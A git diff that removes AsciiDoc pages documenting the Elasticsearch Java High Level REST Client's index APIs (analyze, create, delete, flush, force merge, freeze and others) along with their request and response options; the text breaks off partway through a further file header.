+++ /dev/null @@ -1,38 +0,0 @@ --- -:api: slm-stop-slm -:request: StopSLMRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop Snapshot Lifecycle Management API - - -[id="{upid}-{api}-request"] -==== Request - -The Stop Snapshot Management API allows you to stop Snapshot Lifecycle -Management temporarily. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to stop Snapshot -Lifecycle Management was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to stop Snapshot Lifecycle Management was -acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/index.asciidoc b/docs/java-rest/high-level/index.asciidoc deleted file mode 100644 index 21d78da171c..00000000000 --- a/docs/java-rest/high-level/index.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -:mainid: java-rest-high - -[id="{mainid}"] -= Java High Level REST Client - -[partintro] --- -added[6.0.0-beta1] - -The Java High Level REST Client works on top of the Java Low Level REST client. -Its main goal is to expose API specific methods, that accept request objects as -an argument and return response objects, so that request marshalling and -response un-marshalling is handled by the client itself. - -Each API can be called synchronously or asynchronously. The synchronous -methods return a response object, while the asynchronous methods, whose names -end with the `async` suffix, require a listener argument that is notified -(on the thread pool managed by the low level client) once a response or an -error is received. - -The Java High Level REST Client depends on the Elasticsearch core project. -It accepts the same request arguments as the `TransportClient` and returns -the same response objects. - --- - -:doc-tests: {elasticsearch-root}/client/rest-high-level/src/test/java/org/elasticsearch/client/documentation -:hlrc-tests: {elasticsearch-root}/client/rest-high-level/src/test/java/org/elasticsearch/client - -include::getting-started.asciidoc[] -include::supported-apis.asciidoc[] -include::java-builders.asciidoc[] -include::migration.asciidoc[] -include::../license.asciidoc[] - -:doc-tests!: -:mainid!: diff --git a/docs/java-rest/high-level/indices/analyze.asciidoc b/docs/java-rest/high-level/indices/analyze.asciidoc deleted file mode 100644 index 9464394fd1e..00000000000 --- a/docs/java-rest/high-level/indices/analyze.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ --- -:api: analyze -:request: AnalyzeRequest -:response: AnalyzeResponse --- - -[id="{upid}-{api}"] -=== Analyze API - -[id="{upid}-{api}-request"] -==== Analyze Request - -An +{request}+ contains the text to analyze, and one of several options to -specify how the analysis should be performed. - -The simplest version uses a built-in analyzer: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-builtin-request] ---------------------------------------------------- -<1> A built-in analyzer -<2> The text to include. Multiple strings are treated as a multi-valued field - -You can configure a custom analyzer: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-custom-request] ---------------------------------------------------- -<1> Configuration for a custom tokenfilter -<2> Configure the tokenizer -<3> Configure char filters -<4> Add a built-in tokenfilter -<5> Add the custom tokenfilter - -You can also build a custom normalizer, by including only charfilters and -tokenfilters: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-custom-normalizer-request] ---------------------------------------------------- - -You can analyze text using an analyzer defined in an existing index: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-index-request] ---------------------------------------------------- -<1> The index containing the mappings -<2> The analyzer defined on this index to use - -Or you can use a normalizer: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-index-normalizer-request] ---------------------------------------------------- -<1> The index containing the mappings -<2> The normalizer defined on this index to use - -You can analyze text using the mappings for a particular field in an index: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-field-request] ---------------------------------------------------- - -==== Optional arguments -The following arguments can also optionally be provided: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-explain] ---------------------------------------------------- -<1> Setting `explain` to true will add further details to the response -<2> Setting `attributes` allows you to return only token attributes that you are -interested in - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Analyze Response - -The returned +{response}+ allows you to retrieve details of the analysis as -follows: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-tokens] ---------------------------------------------------- -<1> `AnalyzeToken` holds information about the individual tokens produced by analysis - -If `explain` was set to `true`, then information is instead returned from the `detail()` -method: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-detail] ---------------------------------------------------- -<1> `DetailAnalyzeResponse` holds more detailed information about tokens produced by -the various substeps in the analysis chain. \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/clear_cache.asciidoc b/docs/java-rest/high-level/indices/clear_cache.asciidoc deleted file mode 100644 index bbd2389ee6e..00000000000 --- a/docs/java-rest/high-level/indices/clear_cache.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ --- -:api: clear-cache -:request: ClearIndicesCacheRequest -:response: ClearIndicesCacheResponse --- - -[id="{upid}-{api}"] -=== Clear Cache API - -[id="{upid}-{api}-request"] -==== Clear Cache Request - -A +{request}+ can be applied to one or more indices, or even on -`_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Clears the cache of one index -<2> Clears the cache of multiple indices -<3> Clears the cache of all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-query] --------------------------------------------------- -<1> Set the `query` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-fielddata] --------------------------------------------------- -<1> Set the `fielddata` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-request] --------------------------------------------------- -<1> Set the `request` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-fields] --------------------------------------------------- -<1> Set the `fields` parameter - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear Cache Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the clear cache request -<2> Number of shards where the clear cache has succeeded -<3> Number of shards where the clear cache has failed -<4> A list of failures if the operation failed on one or more shards - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be cleared were not found \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/clone_index.asciidoc b/docs/java-rest/high-level/indices/clone_index.asciidoc deleted file mode 100644 index 7448b8a402b..00000000000 --- a/docs/java-rest/high-level/indices/clone_index.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ --- -:api: clone-index -:request: ResizeRequest -:response: ResizeResponse --- - -[id="{upid}-{api}"] -=== Clone Index API - -[id="{upid}-{api}-request"] -==== Resize Request - -The Clone Index API requires a +{request}+ instance. -A +{request}+ requires two string arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The target index (first argument) to clone the source index (second argument) into -<2> The resize type needs to be set to `CLONE` - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the clone index API -returns a response, as an `int` -<2> The number of active shard copies to wait for before the clone index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> The settings to apply to the target index, which optionally include the -number of shards to create for it - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The aliases to associate the target index with - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clone Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out - - diff --git a/docs/java-rest/high-level/indices/close_index.asciidoc b/docs/java-rest/high-level/indices/close_index.asciidoc deleted file mode 100644 index 6d6fb917c79..00000000000 --- a/docs/java-rest/high-level/indices/close_index.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: close-index -:request: CloseIndexRequest -:response: CloseIndexResponse --- - -[id="{upid}-{api}"] -=== Close Index API - -[id="{upid}-{api}-request"] -==== Close Index Request - -A +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to close - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is closed -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Close Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/indices/create_index.asciidoc b/docs/java-rest/high-level/indices/create_index.asciidoc deleted file mode 100644 index 004279ba2a8..00000000000 --- a/docs/java-rest/high-level/indices/create_index.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ --- -:api: create-index -:request: CreateIndexRequest -:response: CreateIndexResponse --- - -[id="{upid}-{api}"] -=== Create Index API - -[id="{upid}-{api}-request"] -==== Create Index Request - -A +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to create - -==== Index settings -Each index created can have specific settings associated with it. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> Settings for this index - -[[java-rest-high-create-index-request-mappings]] -==== Index mappings -An index may be created with mappings for its document types - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings] --------------------------------------------------- -<1> The type to define -<2> The mapping for this type, provided as a JSON string - -The mapping source can be provided in different ways in addition to the -`String` example shown above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-mappings-map] --------------------------------------------------- -<1> Mapping source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-mappings-xcontent] --------------------------------------------------- -<1> Mapping source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -==== Index aliases -Aliases can be set at index creation time - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The alias to define - -==== Providing the whole source - -The whole source including all of its sections (mappings, settings and aliases) -can also be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-whole-source] --------------------------------------------------- -<1> The source provided as a JSON string. It can also be provided as a `Map` -or an `XContentBuilder`. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index creation as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the create index API returns a -response, as an `int` -<2> The number of active shard copies to wait for before the create index API returns a -response, as an `ActiveShardCount` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Create Index Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for each shard in the index before timing out diff --git a/docs/java-rest/high-level/indices/delete_alias.asciidoc b/docs/java-rest/high-level/indices/delete_alias.asciidoc deleted file mode 100644 index ec451c5bc5c..00000000000 --- a/docs/java-rest/high-level/indices/delete_alias.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ --- -:api: delete-alias -:request: DeleteAliasRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Alias API - -[id="{upid}-{api}-request"] -==== Delete Alias Request - -An +{request}+ requires an `index` and an `alias` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -[id="{upid}-{api}-response"] -==== Delete Alias Response - -The returned +{response}+ indicates if the request to delete the alias -was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to delete the alias was -acknowledged. - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/delete_index.asciidoc b/docs/java-rest/high-level/indices/delete_index.asciidoc deleted file mode 100644 index c96885790b3..00000000000 --- a/docs/java-rest/high-level/indices/delete_index.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ --- -:api: delete-index -:request: DeleteIndexRequest -:response: DeleteIndexResponse --- - -[id="{upid}-{api}"] -=== Delete Index API - -[id="{upid}-{api}-request"] -==== Delete Index Request - -A +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index deletion as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index deletion as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete Index Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request - -If the index was not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the index to be deleted was not found diff --git a/docs/java-rest/high-level/indices/delete_index_template.asciidoc b/docs/java-rest/high-level/indices/delete_index_template.asciidoc deleted file mode 100644 index 0f28e0d80eb..00000000000 --- a/docs/java-rest/high-level/indices/delete_index_template.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: delete-index-template-v2 -:request: DeleteIndexTemplateV2Request -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Composable Index Template API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Composable Index Template API allows you to delete an index template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of an index template to delete. - -=== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete template request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete template request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/indices/delete_template.asciidoc b/docs/java-rest/high-level/indices/delete_template.asciidoc deleted file mode 100644 index 4ca88f1bfc1..00000000000 --- a/docs/java-rest/high-level/indices/delete_template.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: delete-template -:request: DeleteIndexTemplateRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Template API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Template API allows you to delete an index template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of an index template to delete. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete template request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete template request was acknowledged. - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/exists_alias.asciidoc b/docs/java-rest/high-level/indices/exists_alias.asciidoc deleted file mode 100644 index baaf7585683..00000000000 --- a/docs/java-rest/high-level/indices/exists_alias.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ --- -:api: exists-alias -:request: GetAliasesRequest -:response: Boolean --- - -[id="{upid}-{api}"] -=== Exists Alias API - -[id="{upid}-{api}-request"] -==== Exists Alias Request - -The Exists Alias API uses +{request}+ as its request object. -One or more aliases can be optionally provided either at construction -time or later on through the relevant setter method. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-alias] --------------------------------------------------- -<1> One or more aliases to look for - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices] --------------------------------------------------- -<1> The index or indices that the alias is associated with - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> The `local` flag (defaults to `false`) controls whether the aliases need -to be looked up in the local cluster state or in the cluster state held by -the elected master node - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Exists Alias Response - -The Exists Alias API returns a +{response}+ that indicates whether the provided -alias (or aliases) was found or not. diff --git a/docs/java-rest/high-level/indices/flush.asciidoc b/docs/java-rest/high-level/indices/flush.asciidoc deleted file mode 100644 index 8bcb203186f..00000000000 --- a/docs/java-rest/high-level/indices/flush.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ --- -:api: flush -:request: FlushRequest -:response: FlushResponse --- - -[id="{upid}-{api}"] -=== Flush API - -[id="{upid}-{api}-request"] -==== Flush Request - -A +{request}+ can be applied to one or more indices, or even on `_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Flush one index -<2> Flush multiple indices -<3> Flush all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait] --------------------------------------------------- -<1> Set the `wait_if_ongoing` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-force] --------------------------------------------------- -<1> Set the `force` flag to `true` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Flush Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the flush request -<2> Number of shards where the flush has succeeded -<3> Number of shards where the flush has failed -<4> A list of failures if the operation failed on one or more shards - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be flushed were not found \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/flush_synced.asciidoc b/docs/java-rest/high-level/indices/flush_synced.asciidoc deleted file mode 100644 index e5dfa59153b..00000000000 --- a/docs/java-rest/high-level/indices/flush_synced.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ --- -:api: flush-synced -:request: SyncedFlushRequest -:response: SyncedFlushResponse --- - -[id="{upid}-{api}"] -=== Flush Synced API - -[id="{upid}-{api}-request"] -==== Flush Synced Request - -A +{request}+ can be applied to one or more indices, or even on `_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Flush synced one index -<2> Flush synced multiple indices -<3> Flush synced all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Flush Synced Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the flush request -<2> Number of shards where the flush has succeeded -<3> Number of shards where the flush has failed -<4> Name of the index whose results we are about to calculate. -<5> Total number of shards for index mentioned in 4. -<6> Successful shards for index mentioned in 4. -<7> Failed shards for index mentioned in 4. -<8> One of the failed shard ids of the failed index mentioned in 4. -<9> Reason for failure of copies of the shard mentioned in 8. -<10> JSON represented by a Map. Contains shard related information like id, state, version etc. -for the failed shard copies. If the entire shard failed then this returns an empty map. - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be flushed were not found diff --git a/docs/java-rest/high-level/indices/force_merge.asciidoc b/docs/java-rest/high-level/indices/force_merge.asciidoc deleted file mode 100644 index 8126ad597f9..00000000000 --- a/docs/java-rest/high-level/indices/force_merge.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ --- -:api: force-merge -:request: ForceMergeRequest -:response: ForceMergeResponse --- - -[id="{upid}-{api}"] -=== Force Merge API - -[id="{upid}-{api}-request"] -==== Force merge Request - -A +{request}+ can be applied to one or more indices, or even on `_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Force merge one index -<2> Force merge multiple indices -<3> Force merge all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-segments-num] --------------------------------------------------- -<1> Set `max_num_segments` to control the number of segments to merge down to. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-only-expunge-deletes] --------------------------------------------------- -<1> Set the `only_expunge_deletes` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-flush] --------------------------------------------------- -<1> Set the `flush` flag to `true` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Force Merge Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the force merge request -<2> Number of shards where the force merge has succeeded -<3> Number of shards where the force merge has failed -<4> A list of failures if the operation failed on one or more shards - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be force merged were not found \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/freeze_index.asciidoc b/docs/java-rest/high-level/indices/freeze_index.asciidoc deleted file mode 100644 index 2a26fe8bcd4..00000000000 --- a/docs/java-rest/high-level/indices/freeze_index.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ --- -:api: freeze-index -:request: FreezeIndexRequest -:response: FreezeIndexResponse --- - -[id="{upid}-{api}"] -=== Freeze Index API - -[id="{upid}-{api}-request"] -==== Freeze Index Request - -An +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to freeze - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is frozen -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the freeze index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Freeze Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out diff --git a/docs/java-rest/high-level/indices/get_alias.asciidoc b/docs/java-rest/high-level/indices/get_alias.asciidoc deleted file mode 100644 index 